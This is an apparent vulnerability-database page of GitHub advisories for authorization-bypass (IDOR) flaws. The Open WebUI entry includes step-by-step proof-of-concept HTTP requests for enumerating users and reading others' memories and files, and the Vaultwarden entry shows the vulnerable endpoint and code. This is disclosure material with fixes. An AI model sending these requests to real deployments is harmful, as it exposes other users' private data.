Common Weakness Enumeration

CWE-639

Allowed

Authorization Bypass Through User-Controlled Key

Abstraction: Base · Status: Incomplete

The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.

3223 vulnerabilities reference this CWE, most recent first.

GHSA-W74R-M534-93CF

Vulnerability from github – Published: 2025-07-21 21:31 – Updated: 2025-07-22 15:32
VLAI
Details

Insecure Direct Object Reference (IDOR) vulnerability in Dippy (chat.dippy.ai) v2 allows attackers to gain sensitive information via the conversation_id parameter to the conversation_history endpoint.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-51868"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-21T20:15:41Z",
    "severity": "HIGH"
  },
  "details": "Insecure Direct Object Reference (IDOR) vulnerability in Dippy (chat.dippy.ai) v2 allows attackers to gain sensitive information via the conversation_id parameter to the conversation_history endpoint.",
  "id": "GHSA-w74r-m534-93cf",
  "modified": "2025-07-22T15:32:42Z",
  "published": "2025-07-21T21:31:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51868"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Secsys-FDU/CVE-2025-51868"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W7QW-JGG9-3F92

Vulnerability from github – Published: 2024-08-19 00:31 – Updated: 2024-08-19 00:31
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in Propovoice Propovoice CRM.This issue affects Propovoice CRM: from n/a through 1.7.6.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-43350"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-18T22:15:12Z",
    "severity": "MODERATE"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in Propovoice Propovoice CRM.This issue affects Propovoice CRM: from n/a through 1.7.6.4.",
  "id": "GHSA-w7qw-jgg9-3f92",
  "modified": "2024-08-19T00:31:09Z",
  "published": "2024-08-19T00:31:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43350"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/propovoice/wordpress-propovoice-crm-plugin-1-7-6-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W7V8-FCM4-P35G

Vulnerability from github – Published: 2024-11-13 06:30 – Updated: 2024-11-13 06:30
VLAI
Details

The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.6 via the 'bhf' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-10794"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-13T04:15:03Z",
    "severity": "MODERATE"
  },
  "details": "The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.6 via the \u0027bhf\u0027 shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.",
  "id": "GHSA-w7v8-fcm4-p35g",
  "modified": "2024-11-13T06:30:29Z",
  "published": "2024-11-13T06:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10794"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3185478/boostify-header-footer-builder/trunk/inc/class-boostify-header-footer-builder.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6e9f6d07-5ba5-48ad-bfcc-084913436b39?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W825-5MP6-XXG5

Vulnerability from github – Published: 2025-11-25 09:31 – Updated: 2026-04-08 18:33
VLAI
Details

The Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.9 via several functions in class-th-wishlist-frontend.php due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to modify other user's wishlists

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12040"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-25T08:15:47Z",
    "severity": "MODERATE"
  },
  "details": "The Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.9 via several functions in class-th-wishlist-frontend.php due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to modify other user\u0027s wishlists",
  "id": "GHSA-w825-5mp6-xxg5",
  "modified": "2026-04-08T18:33:58Z",
  "published": "2025-11-25T09:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12040"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=3402486%40th-wishlist\u0026new=3402486%40th-wishlist\u0026sfp_email=\u0026sfph_mail="
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/th-wishlist"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6d7c8f79-4dfd-4d6f-b533-dc7a5998dfc1?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W8GM-V2V6-G83P

Vulnerability from github – Published: 2022-06-10 00:00 – Updated: 2022-06-18 00:00
VLAI
Details

An Insecure Direct Object Reference (IDOR) issue in fn2Web in ihb eG FlexNow before 2.04.09.016 allows remote authenticated attackers to obtain sensitive student information (final grades, study courses, degrees) by changing the student ID parameter in the HTTP POST request to the FrontControllerSS endpoint.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-30760"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-09T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An Insecure Direct Object Reference (IDOR) issue in fn2Web in ihb eG FlexNow before 2.04.09.016 allows remote authenticated attackers to obtain sensitive student information (final grades, study courses, degrees) by changing the student ID parameter in the HTTP POST request to the FrontControllerSS endpoint.",
  "id": "GHSA-w8gm-v2v6-g83p",
  "modified": "2022-06-18T00:00:20Z",
  "published": "2022-06-10T00:00:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30760"
    },
    {
      "type": "WEB",
      "url": "https://homepage.ruhr-uni-bochum.de/Christian.Krug-q97/CVE-2022-30760.html"
    },
    {
      "type": "WEB",
      "url": "https://wiki.ihb-eg.de/doku.php/releasenotes/fn2web2.04.09"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W8HP-6W9C-QP6H

Vulnerability from github – Published: 2026-06-15 21:30 – Updated: 2026-06-15 21:30
VLAI
Details

Unauthenticated Sensitive Data Exposure in EmbedPress <= 4.5.2 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-48872"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-15T21:17:16Z",
    "severity": "HIGH"
  },
  "details": "Unauthenticated Sensitive Data Exposure in EmbedPress \u003c= 4.5.2 versions.",
  "id": "GHSA-w8hp-6w9c-qp6h",
  "modified": "2026-06-15T21:30:48Z",
  "published": "2026-06-15T21:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48872"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/embedpress/vulnerability/wordpress-embedpress-plugin-4-5-2-sensitive-data-exposure-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W8W9-P22V-M9JP

Vulnerability from github – Published: 2026-03-16 15:30 – Updated: 2026-03-16 15:30
VLAI
Details

The Wicked Folders – Folder Organizer for Pages, Posts, and Custom Post Types plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the delete_folders() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary folders created by other users.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1883"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-16T14:18:08Z",
    "severity": "MODERATE"
  },
  "details": "The Wicked Folders \u2013 Folder Organizer for Pages, Posts, and Custom Post Types plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the delete_folders() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary folders created by other users.",
  "id": "GHSA-w8w9-p22v-m9jp",
  "modified": "2026-03-16T15:30:42Z",
  "published": "2026-03-16T15:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1883"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3473857/wicked-folders"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cec2c52-d780-4d94-a5b2-d3b405bce49c?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W99J-CV6Q-Q3W7

Vulnerability from github – Published: 2025-09-30 12:30 – Updated: 2025-10-08 18:30
VLAI
Details

Insecure Direct Object Reference (IDOR) vulnerability in BOLD Workplanner in versions prior to 2.5.25 (4935b438f9b), consisting of a lack of adequate validation of user input, allowing an authenticated user to access to planning counter details using unauthorised internal identifiers.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41095"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-30T11:37:40Z",
    "severity": "HIGH"
  },
  "details": "Insecure Direct Object Reference (IDOR) vulnerability in BOLD Workplanner in versions prior to 2.5.25 (4935b438f9b), consisting of a lack of adequate validation of user input, allowing an authenticated user to\u00a0access to planning counter details using unauthorised internal identifiers.",
  "id": "GHSA-w99j-cv6q-q3w7",
  "modified": "2025-10-08T18:30:15Z",
  "published": "2025-09-30T12:30:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41095"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/insecure-direct-object-reference-gps-bold-workplanner"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-W9F8-GXF9-RHVW

Vulnerability from github – Published: 2026-03-27 15:35 – Updated: 2026-03-27 15:35
VLAI
Summary
Open WebUI's Insecure Direct Object Reference (IDOR) allows access to other users' memories
Details

Summary

Any authenticated user can read other users' private memories via /api/v1/retrieval/query/collection

Details

Vulnerability 1: Missing authorization in collection querying

In backend/open_webui/routers/retrieval.py, the query_collection_handler function accepts a list of collection_names but performs no ownership validation:

async def query_collection_handler(
    request: Request,
    form_data: QueryCollectionsForm,
    user=Depends(get_verified_user),  # Only checks authentication, not authorization
):

Collection names follow predictable patterns: - User files: file-{FILE_UUID} - User memories: user-memory-{USER_UUID} (requires Memory experimental feature)

PoC

Environment: Open WebUI v0.8.3, default configuration. Setup: 1. Register two users: admin (first user) and attacker (second user). 2. As admin, upload a PDF document through chat. 3. As admin, enable Memory (Settings → Personalization → Memory) and add some memories.

Exploitation — Step 1: Enumerate all users

GET /api/v1/users/search HTTP/1.1
Host: <target>
Authorization: Bearer <attacker_token>

Response reveals all users including admin's UUID, email, and role:

{
  "users": [
    {
      "id": "1e4756eb-b064-4781-8b06-4979bca59c8b",
      "name": "user",
      "email": "user@test.com",
      "role": "user"
    },
    {
      "id": "81d2f94a-3dfb-479c-af98-e29f0f40c4ba",
      "name": "admin",
      "email": "admin@test.com",
      "role": "admin"
    }
  ]
}

1poc - users

Exploitation — Step 2: Read admin's memories

Using the admin UUID obtained in Step 1, query their private memory collection:

POST /api/v1/retrieval/query/collection HTTP/1.1
Host: <target>
Authorization: Bearer <attacker_token>
Content-Type: application/json

{
  "collection_names": ["user-memory-<admin_UUID_from_step_1>"],
  "query": "test"
}

Response returns admin's private memories:

{
  "documents": [["User is testing IDOR", "User - Mariusz, security researcher"]]
}

2poc - memory

Note: Step 2 requires the Memory experimental feature to be enabled. Steps 1 and 3 work on default configuration.

Exploitation — Step 3: Read admin's private file (Vulnerability 1)

File collections use the pattern file-{FILE_UUID}. The file UUID must be obtained separately. Once known:

POST /api/v1/retrieval/query/collection HTTP/1.1
Host: <target>
Authorization: Bearer <attacker_token>
Content-Type: application/json

{
  "collection_names": ["file-<file_UUID>"],
  "query": "test"
}

Response returns admin's private document content and full metadata:

{
  "documents": [["Test PDF  \nabc   \nbcd"]],
  "metadatas": [[{
    "name": "Test PDF.pdf",
    "author": "Mariusz Maik",
    "created_by": "81d2f94a-3dfb-479c-af98-e29f0f40c4ba",
    "file_id": "243bee10-49ad-466f-884b-67b6b3d74968"
  }]]
}

image

Impact

  • Document theft: Any authenticated user can read the full content and metadata of files uploaded by any other user, including admins.
  • User enumeration: All user UUIDs, emails, names, and roles are exposed to any authenticated user via /api/v1/users/search.
  • Memory leakage: When the Memory experimental feature is enabled, personal memories stored by users for LLM personalization can be read by any other user — directly contradicting the official documentation.
  • No admin privileges required: A regular user account is sufficient to exploit all of the above.

Suggested Fix

1. Add ownership validation in /api/v1/retrieval/query/collection:

async def query_collection_handler(
    request: Request,
    form_data: QueryCollectionsForm,
    user=Depends(get_verified_user),
):
    for collection_name in form_data.collection_names:
        if collection_name.startswith("user-memory-"):
            owner_id = collection_name.replace("user-memory-", "")
            if owner_id != user.id and user.role != "admin":
                raise HTTPException(status_code=403, detail="Access denied")
        elif collection_name.startswith("file-"):
            file_id = collection_name.replace("file-", "")
            # user_has_access_to_file — placeholder; verify file ownership
            # e.g. check if created_by matches user.id
            if not user_has_access_to_file(user.id, file_id):
                raise HTTPException(status_code=403, detail="Access denied")

2. Restrict /api/v1/users/search to admin-only or limit the fields returned to non-privileged users.

Disclosure

AI was used to assist with writing this report. The vulnerability was identified and confirmed through hands-on testing on Open WebUI v0.8.3. All screenshots are from real testing.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.5"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29071"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T15:35:49Z",
    "nvd_published_at": "2026-03-27T00:16:22Z",
    "severity": "LOW"
  },
  "details": "### Summary\nAny authenticated user can read other users\u0027 private memories via `/api/v1/retrieval/query/collection`\n\n### Details\n**Vulnerability 1: Missing authorization in collection querying**\n\nIn `backend/open_webui/routers/retrieval.py`, the `query_collection_handler` function accepts a list of `collection_names` but performs no ownership validation:\n\n```python\nasync def query_collection_handler(\n    request: Request,\n    form_data: QueryCollectionsForm,\n    user=Depends(get_verified_user),  # Only checks authentication, not authorization\n):\n```\n\nCollection names follow predictable patterns:\n- User files: `file-{FILE_UUID}`\n- User memories: `user-memory-{USER_UUID}` (requires Memory experimental feature)\n\n### PoC\n**Environment:** Open WebUI v0.8.3, default configuration.\n**Setup:**\n1. Register two users: admin (first user) and attacker (second user).\n2. As admin, upload a PDF document through chat.\n3. As admin, enable Memory (Settings \u2192 Personalization \u2192 Memory) and add some memories.\n\n**Exploitation \u2014 Step 1: Enumerate all users**\n\n```\nGET /api/v1/users/search HTTP/1.1\nHost: \u003ctarget\u003e\nAuthorization: Bearer \u003cattacker_token\u003e\n```\n\nResponse reveals all users including admin\u0027s UUID, email, and role:\n\n```json\n{\n  \"users\": [\n    {\n      \"id\": \"1e4756eb-b064-4781-8b06-4979bca59c8b\",\n      \"name\": \"user\",\n      \"email\": \"user@test.com\",\n      \"role\": \"user\"\n    },\n    {\n      \"id\": \"81d2f94a-3dfb-479c-af98-e29f0f40c4ba\",\n      \"name\": \"admin\",\n      \"email\": \"admin@test.com\",\n      \"role\": \"admin\"\n    }\n  ]\n}\n```\n\n\u003cimg width=\"1340\" height=\"731\" alt=\"1poc - users\" src=\"https://github.com/user-attachments/assets/46d1cb64-2f84-480e-b887-819008ddabc9\" /\u003e\n\n**Exploitation \u2014 Step 2: Read admin\u0027s memories**\n\nUsing the admin UUID obtained in Step 1, query their private memory collection:\n\n```\nPOST /api/v1/retrieval/query/collection HTTP/1.1\nHost: \u003ctarget\u003e\nAuthorization: Bearer \u003cattacker_token\u003e\nContent-Type: application/json\n\n{\n  \"collection_names\": [\"user-memory-\u003cadmin_UUID_from_step_1\u003e\"],\n  \"query\": \"test\"\n}\n```\n\nResponse returns admin\u0027s private memories:\n\n```json\n{\n  \"documents\": [[\"User is testing IDOR\", \"User - Mariusz, security researcher\"]]\n}\n```\n\n\u003cimg width=\"1285\" height=\"606\" alt=\"2poc - memory\" src=\"https://github.com/user-attachments/assets/eac7c129-dcad-4afd-9449-2ca93b19e082\" /\u003e\n\n**Note:** Step 2 requires the Memory experimental feature to be enabled. Steps 1 and 3 work on default configuration.\n\n**Exploitation \u2014 Step 3: Read admin\u0027s private file (Vulnerability 1)**\n\nFile collections use the pattern `file-{FILE_UUID}`. The file UUID must be obtained separately. Once known:\n\n```\nPOST /api/v1/retrieval/query/collection HTTP/1.1\nHost: \u003ctarget\u003e\nAuthorization: Bearer \u003cattacker_token\u003e\nContent-Type: application/json\n\n{\n  \"collection_names\": [\"file-\u003cfile_UUID\u003e\"],\n  \"query\": \"test\"\n}\n```\n\nResponse returns admin\u0027s private document content and full metadata:\n\n```json\n{\n  \"documents\": [[\"Test PDF  \\nabc   \\nbcd\"]],\n  \"metadatas\": [[{\n    \"name\": \"Test PDF.pdf\",\n    \"author\": \"Mariusz Maik\",\n    \"created_by\": \"81d2f94a-3dfb-479c-af98-e29f0f40c4ba\",\n    \"file_id\": \"243bee10-49ad-466f-884b-67b6b3d74968\"\n  }]]\n}\n```\n\n\u003cimg width=\"1413\" height=\"908\" alt=\"image\" src=\"https://github.com/user-attachments/assets/43041261-ec98-4f3f-8c26-a0c63ef18596\" /\u003e\n\n### Impact\n-  **Document theft:** Any authenticated user can read the full content and metadata of files uploaded by any other user, including admins.\n- **User enumeration:** All user UUIDs, emails, names, and roles are exposed to any authenticated user via `/api/v1/users/search`.\n- **Memory leakage:** When the Memory experimental feature is enabled, personal memories stored by users for LLM personalization can be read by any other user \u2014 directly contradicting the official documentation.\n- **No admin privileges required:** A regular user account is sufficient to exploit all of the above.\n\n### Suggested Fix\n\n**1. Add ownership validation in `/api/v1/retrieval/query/collection`:**\n\n```python\nasync def query_collection_handler(\n    request: Request,\n    form_data: QueryCollectionsForm,\n    user=Depends(get_verified_user),\n):\n    for collection_name in form_data.collection_names:\n        if collection_name.startswith(\"user-memory-\"):\n            owner_id = collection_name.replace(\"user-memory-\", \"\")\n            if owner_id != user.id and user.role != \"admin\":\n                raise HTTPException(status_code=403, detail=\"Access denied\")\n        elif collection_name.startswith(\"file-\"):\n            file_id = collection_name.replace(\"file-\", \"\")\n            # user_has_access_to_file \u2014 placeholder; verify file ownership\n            # e.g. check if created_by matches user.id\n            if not user_has_access_to_file(user.id, file_id):\n                raise HTTPException(status_code=403, detail=\"Access denied\")\n```\n\n**2. Restrict `/api/v1/users/search`** to admin-only or limit the fields returned to non-privileged users.\n\n### Disclosure\n\nAI was used to assist with writing this report. The vulnerability was identified and confirmed through hands-on testing on Open WebUI v0.8.3. All screenshots are from real testing.",
  "id": "GHSA-w9f8-gxf9-rhvw",
  "modified": "2026-03-27T15:35:49Z",
  "published": "2026-03-27T15:35:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29071"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI\u0027s Insecure Direct Object Reference (IDOR) allows access to other users\u0027 memories"
}

GHSA-W9F8-M526-H7FH

Vulnerability from github – Published: 2026-03-04 20:14 – Updated: 2026-03-04 20:14
VLAI
Summary
Vaultwarden has Unauthorized Access via Partial Update API on Another User’s Cipher
Details

Summary

In the test environment, it was confirmed that an authenticated regular user can specify another user’s cipher_id and call:

PUT /api/ciphers/{id}/partial

Even though the standard retrieval API correctly denies access to that cipher, the partial update endpoint returns 200 OK and exposes cipherDetails (including name, notes, data, secureNote, etc.).

Description

put_cipher_partial retrieves the target Cipher but does not perform ownership or access control checks before returning to_json. Authorization checks present in the normal update API are missing here. src/api/core/ciphers.rs:717

let Some(cipher) = Cipher::find_by_uuid(&cipher_id, &conn).await else {
    err!("Cipher doesn't exist")
};

if let Some(ref folder_id) = data.folder_id {
    if Folder::find_by_uuid_and_user(folder_id, &headers.user.uuid, &conn).await.is_none() {
        err!("Invalid folder", "Folder does not exist or belongs to another user");
    }
}

// Move cipher
cipher.move_to_folder(data.folder_id.clone(), &headers.user.uuid, &conn).await?;

// Update favorite
cipher.set_favorite(Some(data.favorite), &headers.user.uuid, &conn).await?;

Ok(Json(cipher.to_json(&headers.host, &headers.user.uuid, None, CipherSyncType::User, &conn).await?))

By comparison, the standard update API includes an explicit authorization check: src/api/core/ciphers.rs:688

if !cipher.is_write_accessible_to_user(&headers.user.uuid, &conn).await {
    err!("Cipher is not write accessible")
}

The to_json method does not abort processing when access restrictions are not met; instead, it proceeds to construct and return a detailed response. src/db/models/cipher.rs:175

let (read_only, hide_passwords, _) = if sync_type == CipherSyncType::User {
    match self.get_access_restrictions(user_uuid, cipher_sync_data, conn).await {
        Some((ro, hp, mn)) => (ro, hp, mn),
        None => {
            error!("Cipher ownership assertion failure");
            (true, true, false)
        }
    }
} else {
    (false, false, false)
};

src/db/models/cipher.rs:335

let mut json_object = json!({
    "object": "cipherDetails",
    "id": self.uuid,
    "type": self.atype,
    ...
    "name": self.name,
    "notes": self.notes,
    "fields": fields_json,
    "data": data_json,
    ...
});

Preconditions

  • The attacker possesses a valid regular-user JWT (Bearer token).
  • The attacker knows the target (victim) cipher_id.

Steps to Reproduce

  1. Prepare the attacker JWT and victim cipher_id (preconditions).
  2. Baseline check: confirm that standard retrieval is denied. image

  3. Execute the vulnerable API. Confirm that 200 OK is returned and that cipherDetails includes fields such as id, name, notes, secureNote, etc. image

Potential Impact

  • Unauthorized disclosure of other users’ cipher information (confidentiality breach).
  • Creation of unauthorized associations within the attacker’s user context (e.g., favorite or folder operations).
  • The response from /api/ciphers/<cipher_id>/partial includes attachments[].url.

In filesystem (FS) deployments, this returns a tokenized endpoint such as:

/attachments/<cipher>/<file>?token=...

In object storage deployments, it returns a short-lived pre-signed URL.

As a result, an attacker can use these URLs to directly download attachment data that they are not authorized to access.

This can lead to disclosure of sensitive information stored in the Vault, including personal data and authentication credentials. Such exposure may further result in account compromise, lateral movement, and other secondary impacts.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.35.3"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "vaultwarden"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.35.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27898"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-04T20:14:06Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nIn the test environment, it was confirmed that an authenticated regular user can specify another user\u2019s `cipher_id` and call:\n\n```\nPUT /api/ciphers/{id}/partial\n```\n\nEven though the standard retrieval API correctly denies access to that cipher, the partial update endpoint returns **200 OK** and exposes `cipherDetails` (including `name`, `notes`, `data`, `secureNote`, etc.).\n\n\n\n## Description\n\n`put_cipher_partial` retrieves the target Cipher but does **not perform ownership or access control checks** before returning `to_json`.\nAuthorization checks present in the normal update API are missing here.\nsrc/api/core/ciphers.rs:717\n\n```rust\nlet Some(cipher) = Cipher::find_by_uuid(\u0026cipher_id, \u0026conn).await else {\n    err!(\"Cipher doesn\u0027t exist\")\n};\n\nif let Some(ref folder_id) = data.folder_id {\n    if Folder::find_by_uuid_and_user(folder_id, \u0026headers.user.uuid, \u0026conn).await.is_none() {\n        err!(\"Invalid folder\", \"Folder does not exist or belongs to another user\");\n    }\n}\n\n// Move cipher\ncipher.move_to_folder(data.folder_id.clone(), \u0026headers.user.uuid, \u0026conn).await?;\n\n// Update favorite\ncipher.set_favorite(Some(data.favorite), \u0026headers.user.uuid, \u0026conn).await?;\n\nOk(Json(cipher.to_json(\u0026headers.host, \u0026headers.user.uuid, None, CipherSyncType::User, \u0026conn).await?))\n```\n\nBy comparison, the standard update API includes an explicit authorization check:\nsrc/api/core/ciphers.rs:688\n\n```rust\nif !cipher.is_write_accessible_to_user(\u0026headers.user.uuid, \u0026conn).await {\n    err!(\"Cipher is not write accessible\")\n}\n```\n\nThe `to_json` method does not abort processing when access restrictions are not met; instead, it proceeds to construct and return a detailed response.\nsrc/db/models/cipher.rs:175\n\n```rust\nlet (read_only, hide_passwords, _) = if sync_type == CipherSyncType::User {\n    match self.get_access_restrictions(user_uuid, cipher_sync_data, conn).await {\n        Some((ro, hp, mn)) =\u003e (ro, hp, mn),\n        None =\u003e {\n            error!(\"Cipher ownership assertion failure\");\n            (true, true, false)\n        }\n    }\n} else {\n    (false, false, false)\n};\n```\nsrc/db/models/cipher.rs:335\n\n```rust\nlet mut json_object = json!({\n    \"object\": \"cipherDetails\",\n    \"id\": self.uuid,\n    \"type\": self.atype,\n    ...\n    \"name\": self.name,\n    \"notes\": self.notes,\n    \"fields\": fields_json,\n    \"data\": data_json,\n    ...\n});\n```\n\n\n## Preconditions\n\n* The attacker possesses a valid regular-user JWT (Bearer token).\n* The attacker knows the target (victim) `cipher_id`.\n\n\n## Steps to Reproduce\n\n1. Prepare the attacker JWT and victim `cipher_id` (preconditions).\n2. Baseline check: confirm that standard retrieval is denied.\n\u003cimg width=\"2014\" height=\"855\" alt=\"image\" src=\"https://github.com/user-attachments/assets/32b12cc9-3672-4a88-afd0-ef7715474662\" /\u003e\n\n\n3. Execute the vulnerable API. Confirm that **200 OK** is returned and that `cipherDetails` includes fields such as `id`, `name`, `notes`, `secureNote`, etc.\n\u003cimg width=\"2018\" height=\"1113\" alt=\"image\" src=\"https://github.com/user-attachments/assets/341b330c-8d55-4f06-a622-0d7da28f62fd\" /\u003e\n\n\n## Potential Impact\n\n* Unauthorized disclosure of other users\u2019 cipher information (confidentiality breach).\n* Creation of unauthorized associations within the attacker\u2019s user context (e.g., `favorite` or folder operations).\n* The response from `/api/ciphers/\u003ccipher_id\u003e/partial` includes `attachments[].url`.\n\nIn 